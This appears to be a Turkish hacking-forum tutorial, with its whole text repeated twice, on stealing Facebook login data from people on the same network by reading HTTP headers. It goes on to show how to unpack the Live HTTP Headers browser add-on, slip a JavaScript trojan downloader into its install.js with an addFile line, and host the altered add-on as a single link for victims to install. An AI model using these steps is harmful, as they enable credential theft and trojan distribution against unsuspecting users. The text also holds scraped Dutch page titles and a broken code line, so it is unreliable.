Selamün Aleyküm
Bugün mail güvenliği hakkında makalelere biraz göz gezdirdim.
Bazıları dikkatimi çekti.Örneğin WireShark ile Facebook Hack konusu.
Nedir bu diyecek olursanız:
Sizinle aynı ağda bulunan bilgisayardan; Welkom bij Facebook - Meld je aan, registreer je of ontdek meer adresine giren kişinin mail bilgilerini ağınızı dileyerek ele geçirebiliyorsunuz.
Peki http://facebook.coma giriş yapmak için gönderilen verileri sadece böylemi elde edebiliriz?
Cevap:Hayır
Bu bilgiler facebooka giriş yaptığınız anda header olarak facebook serverine gönderilir.
Yani header bilgilerini takip edersek kişinin mail bilgilerie ulaşırız.
Bu wireshark da olduğu gibi uzun adımlardan oluşan bir yöntem değildir.
Live Http Headeri kurunuz ve çalıştırınız yeterlidir:
Yukarda kırmızı ile yazılan yere dikkat ediniz gönderdiğimiz veriyi içermektedir.
Live Http Header bir .xpi programıdır.
Bu programlar javascript progr*****larından oluşur ve herhangi bir .xpi programının linkine
tıkladığınız zaman direk olarak kuruluma geçer.
Yani şu şekilde:
Yukarda kuruluma bastığınız anda eklenti yüklenir.
Hadi bu Live Http Header programının javascriptleriyle biraz oynayalım.
Yapacağınız ilk şey 7-zip ile bu xpi programlarını açıp komponentlere göz gezdirmek olacaktır:
Evet yukardaki install.js hangi javascripti yükleneceği ile alakalıdir.Chrome klasörünün altında ise
bu javascript dosyaları bulunmaktadır.
Şimdi bir javascript downloader ile trojen yüklemeye çalışacağız:
# JavaDownloaderi 7-zip components/livehttpheader.rar içine atıyoruz
# Istall.js ye ufak bir kod parçası ekleyeceğiz.
addFile(X_NAME, prefFolder, "JavaDownloader.js)
# Ve programımızı bir hosta atıp tek link haline getiriyoruz:
[url=http://kasva.com/Live.xpi]kasva.com - de beste bron van informatie over kasva. Deze website is te koop!
Bugün mail güvenliği hakkında makalelere biraz göz gezdirdim.
Bazıları dikkatimi çekti.Örneğin WireShark ile Facebook Hack konusu.
Nedir bu diyecek olursanız:
Sizinle aynı ağda bulunan bilgisayardan; Welkom bij Facebook - Meld je aan, registreer je of ontdek meer adresine giren kişinin mail bilgilerini ağınızı dileyerek ele geçirebiliyorsunuz.
Peki http://facebook.coma giriş yapmak için gönderilen verileri sadece böylemi elde edebiliriz?
Cevap:Hayır
Bu bilgiler facebooka giriş yaptığınız anda header olarak facebook serverine gönderilir.
Yani header bilgilerini takip edersek kişinin mail bilgilerie ulaşırız.
Bu wireshark da olduğu gibi uzun adımlardan oluşan bir yöntem değildir.
Live Http Headeri kurunuz ve çalıştırınız yeterlidir:
Yukarda kırmızı ile yazılan yere dikkat ediniz gönderdiğimiz veriyi içermektedir.
Live Http Header bir .xpi programıdır.
Bu programlar javascript progr*****larından oluşur ve herhangi bir .xpi programının linkine
tıkladığınız zaman direk olarak kuruluma geçer.
Yani şu şekilde:
Yukarda kuruluma bastığınız anda eklenti yüklenir.
Hadi bu Live Http Header programının javascriptleriyle biraz oynayalım.
Yapacağınız ilk şey 7-zip ile bu xpi programlarını açıp komponentlere göz gezdirmek olacaktır:
Evet yukardaki install.js hangi javascripti yükleneceği ile alakalıdir.Chrome klasörünün altında ise
bu javascript dosyaları bulunmaktadır.
Şimdi bir javascript downloader ile trojen yüklemeye çalışacağız:
# JavaDownloaderi 7-zip components/livehttpheader.rar içine atıyoruz
# Istall.js ye ufak bir kod parçası ekleyeceğiz.
addFile(X_NAME, prefFolder, "JavaDownloader.js)
# Ve programımızı bir hosta atıp tek link haline getiriyoruz:
[url=http://kasva.com/Live.xpi]kasva.com - de beste bron van informatie over kasva. Deze website is te koop!
